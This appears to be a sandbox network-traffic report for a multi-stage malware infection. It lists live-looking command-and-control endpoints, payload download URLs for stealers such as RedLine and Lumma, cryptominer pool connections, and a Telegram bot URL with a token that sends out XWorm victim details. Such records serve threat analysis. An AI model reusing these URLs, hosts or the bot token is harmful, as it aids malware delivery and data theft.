https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8tz-vpQe9h7-ulKDwWBJ2qjVUCUxpeaBe7BF6tj6WmNu6xvJvvxYlkqnAnlPFh-Fve48pza2XAkT8R2x9MoaVexV-RXI5kjSoCAtDOMCrp6pOriB5rP-1LBsvU4WMriN18XavVWkR26ukRhjnecSWEguKpmaEBbR7LM3dE1WfI4jZlcEa%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D6f2c850fe4ba1225cc76e3244f72112d&TIME=20240426T132839Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

tls, http2

2.5kB
9.0kB
20
17

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8tz-vpQe9h7-ulKDwWBJ2qjVUCUxpeaBe7BF6tj6WmNu6xvJvvxYlkqnAnlPFh-Fve48pza2XAkT8R2x9MoaVexV-RXI5kjSoCAtDOMCrp6pOriB5rP-1LBsvU4WMriN18XavVWkR26ukRhjnecSWEguKpmaEBbR7LM3dE1WfI4jZlcEa%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D6f2c850fe4ba1225cc76e3244f72112d&TIME=20240426T132839Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8tz-vpQe9h7-ulKDwWBJ2qjVUCUxpeaBe7BF6tj6WmNu6xvJvvxYlkqnAnlPFh-Fve48pza2XAkT8R2x9MoaVexV-RXI5kjSoCAtDOMCrp6pOriB5rP-1LBsvU4WMriN18XavVWkR26ukRhjnecSWEguKpmaEBbR7LM3dE1WfI4jZlcEa%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D6f2c850fe4ba1225cc76e3244f72112d&TIME=20240426T132839Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

HTTP Response

204
23.62.61.72:443

https://www.bing.com/aes/c.gif?RG=fe0be837c9d846bd9e38dd6aa7f278f8&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T132839Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189

tls, http2

1.5kB
5.4kB
18
13

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=fe0be837c9d846bd9e38dd6aa7f278f8&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T132839Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189

HTTP Response

200
5.42.96.7:80

http://5.42.96.7/zamo7h/index.php

http

axplons.exe

216.1kB
6.3MB
4546
4532

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

GET http://5.42.96.7/lend/alex.exe

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

GET http://5.42.96.7/lend/gold.exe

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

GET http://5.42.96.7/lend/redline1.exe

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

GET http://5.42.96.7/lend/swizzhis.exe

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

GET http://5.42.96.7/lend/lumma1.exe

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200

HTTP Request

GET http://5.42.96.7/lend/taskmgr.exe

HTTP Response

200

HTTP Request

POST http://5.42.96.7/zamo7h/index.php

HTTP Response

200
23.62.61.72:443

https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

tls, http2

1.7kB
6.4kB
18
13

HTTP Request

GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

HTTP Response

200
104.21.39.216:443

https://zippyfinickysofwps.shop/api

tls, http

RegAsm.exe

1.5kB
7.3kB
13
13

HTTP Request

POST https://zippyfinickysofwps.shop/api

HTTP Response

200

HTTP Request

POST https://zippyfinickysofwps.shop/api

HTTP Response

200
172.67.180.137:443

https://acceptabledcooeprs.shop/api

tls, http

RegAsm.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://acceptabledcooeprs.shop/api

HTTP Response

200
185.172.128.33:8970

keks.exe

3.2MB
76.6kB
2449
1473
77.221.151.47:80

http://77.221.151.47/install.exe

http

axplons.exe

157.5kB
4.6MB
3285
3283

HTTP Request

GET http://77.221.151.47/install.exe

HTTP Response

200
185.215.113.67:26260

redline1.exe

3.2MB
43.4kB
2321
824
188.114.96.2:443

https://obsceneclassyjuwks.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://obsceneclassyjuwks.shop/api

HTTP Response

200
104.21.30.191:443

https://miniaturefinerninewjs.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://miniaturefinerninewjs.shop/api

HTTP Response

200
172.67.213.139:443

https://plaintediousidowsko.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://plaintediousidowsko.shop/api

HTTP Response

200
104.21.44.201:443

https://sweetsquarediaslw.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://sweetsquarediaslw.shop/api

HTTP Response

200
104.21.40.92:443

https://holicisticscrarws.shop/api

tls, http

RegAsm.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://holicisticscrarws.shop/api

HTTP Response

200
172.67.186.30:443

https://boredimperissvieos.shop/api

tls, http

RegAsm.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://boredimperissvieos.shop/api

HTTP Response

200
49.13.229.86:80

http://49.13.229.86/c73eed764cc59dcb.php

http

RegAsm.exe

193.3kB
5.4MB
3914
3909

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

GET http://49.13.229.86/84bad7132df89fd7/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

GET http://49.13.229.86/84bad7132df89fd7/freebl3.dll

HTTP Response

200

HTTP Request

GET http://49.13.229.86/84bad7132df89fd7/mozglue.dll

HTTP Response

200

HTTP Request

GET http://49.13.229.86/84bad7132df89fd7/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://49.13.229.86/84bad7132df89fd7/nss3.dll

HTTP Response

200

HTTP Request

GET http://49.13.229.86/84bad7132df89fd7/softokn3.dll

HTTP Response

200

HTTP Request

GET http://49.13.229.86/84bad7132df89fd7/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200

HTTP Request

POST http://49.13.229.86/c73eed764cc59dcb.php

HTTP Response

200
5.42.96.78:80

http://5.42.96.78/files/file300un.exe

http

axplons.exe

102.1kB
2.9MB
2111
2100

HTTP Request

GET http://5.42.96.78/files/file300un.exe

HTTP Response

200
104.21.15.116:443

https://smallelementyjdui.shop/api

tls, http

RegAsm.exe

1.5kB
7.3kB
13
13

HTTP Request

POST https://smallelementyjdui.shop/api

HTTP Response

200

HTTP Request

POST https://smallelementyjdui.shop/api

HTTP Response

200
188.114.96.2:443

https://sofaprivateawarderysj.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://sofaprivateawarderysj.shop/api

HTTP Response

200
172.67.141.60:443

https://lineagelasserytailsd.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
11
10

HTTP Request

POST https://lineagelasserytailsd.shop/api

HTTP Response

200
77.221.151.47:8080

PiercingNetLink.exe

399 B
308 B
6
6
104.21.85.127:443

https://tendencyportionjsuk.shop/api

tls, http

RegAsm.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://tendencyportionjsuk.shop/api

HTTP Response

200
172.67.206.145:443

https://headraisepresidensu.shop/api

tls, http

RegAsm.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://headraisepresidensu.shop/api

HTTP Response

200
185.172.128.19:80

http://185.172.128.19/NewB.exe

http

axplons.exe

15.5kB
442.2kB
335
334

HTTP Request

GET http://185.172.128.19/NewB.exe

HTTP Response

200
172.67.151.60:443

https://appetitesallooonsj.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://appetitesallooonsj.shop/api

HTTP Response

200
172.67.130.179:443

https://minorittyeffeoos.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://minorittyeffeoos.shop/api

HTTP Response

200
185.172.128.19:80

http://185.172.128.19/ghsdh39s/index.php

http

NewB.exe

830 B
637 B
8
6

HTTP Request

POST http://185.172.128.19/ghsdh39s/index.php

HTTP Response

200

HTTP Request

POST http://185.172.128.19/ghsdh39s/index.php

HTTP Response

200
188.114.96.2:443

https://prideconstituiiosjk.shop/api

tls, http

RegAsm.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://prideconstituiiosjk.shop/api

HTTP Response

200
77.221.151.47:8080

PiercingNetLink.exe

399 B
308 B
6
6
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

taskmgr.exe

310 B
347 B
5
4

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
77.221.151.47:8080

PiercingNetLink.exe

353 B
268 B
5
5
5.42.65.67:48396

trf.exe

3.0MB
47.5kB
2238
820
77.221.151.47:8080

PiercingNetLink.exe

353 B
268 B
5
5
77.221.151.47:9090

GameSyncLinks.exe

404 B
608 B
6
7
162.19.139.184:2222

xmr.2miners.com

350789.exe

1.2kB
2.3kB
13
12
172.67.169.89:443

https://yip.su/RNWPd.exe

tls, http

CasPol.exe

987 B
14.2kB
14
18

HTTP Request

GET https://yip.su/RNWPd.exe

HTTP Response

200
172.67.19.24:443

https://pastebin.com/raw/E0rY26ni

tls, http

CasPol.exe

818 B
6.2kB
10
10

HTTP Request

GET https://pastebin.com/raw/E0rY26ni

HTTP Response

200
5.42.96.64:80

http://5.42.96.64/server/ww12/AppGate2103v01.exe

http

CasPol.exe

119.1kB
6.6MB
2517
4703

HTTP Request

GET http://5.42.96.64/server/ww12/AppGate2103v01.exe

HTTP Response

200
5.42.96.78:80

http://5.42.96.78/files/Silent.exe

http

CasPol.exe

121.9kB
6.7MB
2566
4834

HTTP Request

GET http://5.42.96.78/files/setup.exe

HTTP Response

200

HTTP Request

GET http://5.42.96.78/files/Silent.exe
5.42.96.78:80

http://5.42.96.78/files/setup.exe

http

CasPol.exe

125.8kB
6.7MB
2606
4858

HTTP Request

GET http://5.42.96.78/files/setup.exe

HTTP Response

200
172.67.193.79:443

https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe

tls, http

CasPol.exe

846 B
6.2kB
10
11

HTTP Request

GET https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe

HTTP Response

307
104.21.18.166:443

https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe

tls, http

CasPol.exe

850 B
6.2kB
10
11

HTTP Request

GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe

HTTP Response

307
104.21.18.166:443

https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe

tls, http

CasPol.exe

850 B
6.2kB
10
10

HTTP Request

GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe

HTTP Response

307
172.67.193.79:443

https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe

tls, http

CasPol.exe

846 B
6.2kB
10
10

HTTP Request

GET https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe

HTTP Response

307
172.67.193.220:443

https://firstfirecar.com/f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe

tls, http

CasPol.exe

178.2kB
4.5MB
2788
3258

HTTP Request

GET https://firstfirecar.com/f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe

HTTP Response

200
172.67.193.220:443

https://firstfirecar.com/f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe

tls, http

CasPol.exe

202.0kB
4.5MB
2879
3241

HTTP Request

GET https://firstfirecar.com/f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe

HTTP Response

200
172.67.176.131:443

https://jonathantwo.com/f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe

tls, http

CasPol.exe

167.2kB
4.5MB
2622
3224

HTTP Request

GET https://jonathantwo.com/f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe

HTTP Response

200
172.67.176.131:443

https://jonathantwo.com/f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe

tls, http

CasPol.exe

183.8kB
4.6MB
2849
3286

HTTP Request

GET https://jonathantwo.com/f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe

HTTP Response

200
41.83.85.253:80

http://1xst.ru/tech/upd2.php

http

CasPol.exe

300 B
132 B
5
3

HTTP Request

GET http://1xst.ru/tech/upd2.php
41.83.85.253:80

http://1xst.ru/tech/upd2.php

http

CasPol.exe

300 B
132 B
5
3

HTTP Request

GET http://1xst.ru/tech/upd2.php
77.221.151.47:8080

PiercingNetLink.exe

353 B
268 B
5
5
149.154.167.220:443

https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A8DDC453C92C5E97346AB%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20True%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.6

tls, http

taskmgr.exe

1.3kB
7.2kB
11
11

HTTP Request

GET https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A8DDC453C92C5E97346AB%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20True%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.6

HTTP Response

200
77.221.151.47:8080

PiercingNetLink.exe

353 B
268 B
5
5
5.42.96.78:80

http://5.42.96.78/files/Silent.exe

http

CasPol.exe

59.9kB
2.8MB
1193
1993

HTTP Request

GET http://5.42.96.78/files/Silent.exe

HTTP Response

200
85.192.56.26:80

http://85.192.56.26/api/bing_release.php

http

7EhPCHLwVUzTFL9SfbnUelQh.exe

535 B
433 B
7
4

HTTP Request

GET http://85.192.56.26/api/bing_release.php

HTTP Response

200
77.221.151.47:8080

PiercingNetLink.exe

451 B
268 B
7
5
104.26.8.59:443

https://api.myip.com/

tls, http

7EhPCHLwVUzTFL9SfbnUelQh.exe

844 B
6.1kB
8
10

HTTP Request

GET https://api.myip.com/

HTTP Response

200
34.117.186.192:443

https://ipinfo.io/widget/demo/191.101.209.39

tls, http

7EhPCHLwVUzTFL9SfbnUelQh.exe

847 B
5.3kB
7
9

HTTP Request

GET https://ipinfo.io/widget/demo/191.101.209.39

HTTP Response

200
77.221.151.47:8080

PiercingNetLink.exe

353 B
268 B
5
5
45.88.186.125:7000

beshomandotestbesnd.run.place

taskmgr.exe

260 B
5
77.221.151.47:8080

PiercingNetLink.exe

353 B
268 B
5
5
127.0.0.1:7000

taskmgr.exe
77.221.151.47:8080

353 B
268 B
5
5
77.221.151.47:8080

353 B
268 B
5
5
45.76.89.70:80

pool.hashvault.pro

tls

1.5kB
6.3kB
12
13
77.221.151.47:8080

399 B
268 B
6
5
77.221.151.47:8080

451 B
364 B
7
6
77.221.151.47:8080

353 B
268 B
5
5
77.221.151.47:9090

2.3kB
308 B
6
6
77.221.151.47:8080

353 B
268 B
5
5
77.221.151.47:8080

399 B
268 B
6
5
77.221.151.47:8080

399 B
268 B
6
5
77.221.151.47:8080

399 B
268 B
6
5
45.88.186.125:7000

beshomandotestbesnd.run.place

260 B
5
3.80.150.121:443

service-domain.xyz

260 B
5
77.221.151.47:8080

451 B
364 B
7
6
77.221.151.47:8080

399 B
268 B
6
5
77.221.151.47:8080

399 B
268 B
6
5

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

183.142.211.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

183.142.211.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

73.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

73.31.126.40.in-addr.arpa
8.8.8.8:53

72.61.62.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

72.61.62.23.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

7.96.42.5.in-addr.arpa

dns

68 B
128 B
1
1

DNS Request

7.96.42.5.in-addr.arpa
8.8.8.8:53

zippyfinickysofwps.shop

dns

RegAsm.exe

69 B
101 B
1
1

DNS Request

zippyfinickysofwps.shop

DNS Response

104.21.39.216

172.67.148.231
8.8.8.8:53

acceptabledcooeprs.shop

dns

RegAsm.exe

69 B
101 B
1
1

DNS Request

acceptabledcooeprs.shop

DNS Response

172.67.180.137

104.21.59.156
8.8.8.8:53

216.39.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

216.39.21.104.in-addr.arpa
8.8.8.8:53

137.180.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

137.180.67.172.in-addr.arpa
8.8.8.8:53

33.128.172.185.in-addr.arpa

dns

73 B
73 B
1
1

DNS Request

33.128.172.185.in-addr.arpa
8.8.8.8:53

obsceneclassyjuwks.shop

dns

RegAsm.exe

69 B
101 B
1
1

DNS Request

obsceneclassyjuwks.shop

DNS Response

188.114.96.2

188.114.97.2
8.8.8.8:53

miniaturefinerninewjs.shop

dns

RegAsm.exe

72 B
104 B
1
1

DNS Request

miniaturefinerninewjs.shop

DNS Response

104.21.30.191

172.67.173.139
8.8.8.8:53

47.151.221.77.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

47.151.221.77.in-addr.arpa
8.8.8.8:53

67.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

67.113.215.185.in-addr.arpa
8.8.8.8:53

2.96.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

2.96.114.188.in-addr.arpa
8.8.8.8:53

plaintediousidowsko.shop

dns

RegAsm.exe

70 B
102 B
1
1

DNS Request

plaintediousidowsko.shop

DNS Response

172.67.213.139

104.21.53.146
8.8.8.8:53

sweetsquarediaslw.shop

dns

RegAsm.exe

68 B
100 B
1
1

DNS Request

sweetsquarediaslw.shop

DNS Response

104.21.44.201

172.67.203.170
8.8.8.8:53

191.30.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

191.30.21.104.in-addr.arpa
8.8.8.8:53

139.213.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

139.213.67.172.in-addr.arpa
8.8.8.8:53

201.44.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

201.44.21.104.in-addr.arpa
8.8.8.8:53

holicisticscrarws.shop

dns

RegAsm.exe

68 B
100 B
1
1

DNS Request

holicisticscrarws.shop

DNS Response

104.21.40.92

172.67.183.72
8.8.8.8:53

boredimperissvieos.shop

dns

RegAsm.exe

69 B
101 B
1
1

DNS Request

boredimperissvieos.shop

DNS Response

172.67.186.30

104.21.72.135
8.8.8.8:53

92.40.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

92.40.21.104.in-addr.arpa
8.8.8.8:53

30.186.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

30.186.67.172.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

86.229.13.49.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

86.229.13.49.in-addr.arpa
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

smallelementyjdui.shop

dns

RegAsm.exe

68 B
100 B
1
1

DNS Request

smallelementyjdui.shop

DNS Response

104.21.15.116

172.67.162.147
8.8.8.8:53

78.96.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

78.96.42.5.in-addr.arpa
8.8.8.8:53

sofaprivateawarderysj.shop

dns

RegAsm.exe

72 B
104 B
1
1

DNS Request

sofaprivateawarderysj.shop

DNS Response

188.114.96.2

188.114.97.2
8.8.8.8:53

lineagelasserytailsd.shop

dns

RegAsm.exe

71 B
103 B
1
1

DNS Request

lineagelasserytailsd.shop

DNS Response

172.67.141.60

104.21.62.251
8.8.8.8:53

116.15.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

116.15.21.104.in-addr.arpa
8.8.8.8:53

tendencyportionjsuk.shop

dns

RegAsm.exe

70 B
102 B
1
1

DNS Request

tendencyportionjsuk.shop

DNS Response

104.21.85.127

172.67.205.185
8.8.8.8:53

60.141.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

60.141.67.172.in-addr.arpa
8.8.8.8:53

headraisepresidensu.shop

dns

RegAsm.exe

70 B
102 B
1
1

DNS Request

headraisepresidensu.shop

DNS Response

172.67.206.145

104.21.50.137
8.8.8.8:53

appetitesallooonsj.shop

dns

RegAsm.exe

69 B
101 B
1
1

DNS Request

appetitesallooonsj.shop

DNS Response

172.67.151.60

104.21.48.123
8.8.8.8:53

127.85.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

127.85.21.104.in-addr.arpa
8.8.8.8:53

145.206.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

145.206.67.172.in-addr.arpa
8.8.8.8:53

19.128.172.185.in-addr.arpa

dns

73 B
73 B
1
1

DNS Request

19.128.172.185.in-addr.arpa
8.8.8.8:53

minorittyeffeoos.shop

dns

RegAsm.exe

67 B
99 B
1
1

DNS Request

minorittyeffeoos.shop

DNS Response

172.67.130.179

104.21.3.125
8.8.8.8:53

prideconstituiiosjk.shop

dns

RegAsm.exe

70 B
102 B
1
1

DNS Request

prideconstituiiosjk.shop

DNS Response

188.114.96.2

188.114.97.2
8.8.8.8:53

60.151.67.172.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

60.151.67.172.in-addr.arpa

DNS Request

60.151.67.172.in-addr.arpa
8.8.8.8:53

179.130.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

179.130.67.172.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

taskmgr.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

67.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

67.65.42.5.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

xmr.2miners.com

dns

350789.exe

61 B
77 B
1
1

DNS Request

xmr.2miners.com

DNS Response

162.19.139.184
8.8.8.8:53

184.139.19.162.in-addr.arpa

dns

73 B
102 B
1
1

DNS Request

184.139.19.162.in-addr.arpa
8.8.8.8:53

yip.su

dns

CasPol.exe

52 B
84 B
1
1

DNS Request

yip.su

DNS Response

172.67.169.89

104.21.79.77
8.8.8.8:53

pastebin.com

dns

CasPol.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

172.67.19.24

104.20.3.235

104.20.4.235
8.8.8.8:53

onlycitylink.com

dns

CasPol.exe

62 B
94 B
1
1

DNS Request

onlycitylink.com

DNS Response

104.21.18.166

172.67.182.192
8.8.8.8:53

realdeepai.org

dns

CasPol.exe

60 B
92 B
1
1

DNS Request

realdeepai.org

DNS Response

172.67.193.79

104.21.90.14
8.8.8.8:53

1xst.ru

dns

CasPol.exe

106 B
426 B
2
2

DNS Request

1xst.ru

DNS Request

1xst.ru

DNS Response

41.83.85.253

201.119.43.196

200.114.83.251

92.36.226.66

188.237.2.116

175.119.10.231

179.159.229.64

190.146.112.188

189.143.170.242

211.40.39.251

DNS Response

211.40.39.251

41.83.85.253

201.119.43.196

200.114.83.251

92.36.226.66

188.237.2.116

175.119.10.231

179.159.229.64

190.146.112.188

189.143.170.242
8.8.8.8:53

firstfirecar.com

dns

CasPol.exe

62 B
94 B
1
1

DNS Request

firstfirecar.com

DNS Response

172.67.193.220

104.21.60.76
8.8.8.8:53

jonathantwo.com

dns

CasPol.exe

122 B
186 B
2
2

DNS Request

jonathantwo.com

DNS Request

jonathantwo.com

DNS Response

172.67.176.131

104.21.31.124

DNS Response

172.67.176.131

104.21.31.124
8.8.8.8:53

24.19.67.172.in-addr.arpa

dns

142 B
133 B
2
1

DNS Request

24.19.67.172.in-addr.arpa

DNS Request

24.19.67.172.in-addr.arpa
8.8.8.8:53

89.169.67.172.in-addr.arpa

dns

144 B
134 B
2
1

DNS Request

89.169.67.172.in-addr.arpa

DNS Request

89.169.67.172.in-addr.arpa
8.8.8.8:53

79.193.67.172.in-addr.arpa

dns

144 B
134 B
2
1

DNS Request

79.193.67.172.in-addr.arpa

DNS Request

79.193.67.172.in-addr.arpa
8.8.8.8:53

166.18.21.104.in-addr.arpa

dns

144 B
134 B
2
1

DNS Request

166.18.21.104.in-addr.arpa

DNS Request

166.18.21.104.in-addr.arpa
8.8.8.8:53

64.96.42.5.in-addr.arpa

dns

138 B
129 B
2
1

DNS Request

64.96.42.5.in-addr.arpa

DNS Request

64.96.42.5.in-addr.arpa
8.8.8.8:53

220.193.67.172.in-addr.arpa

dns

146 B
135 B
2
1

DNS Request

220.193.67.172.in-addr.arpa

DNS Request

220.193.67.172.in-addr.arpa
8.8.8.8:53

131.176.67.172.in-addr.arpa

dns

146 B
135 B
2
1

DNS Request

131.176.67.172.in-addr.arpa

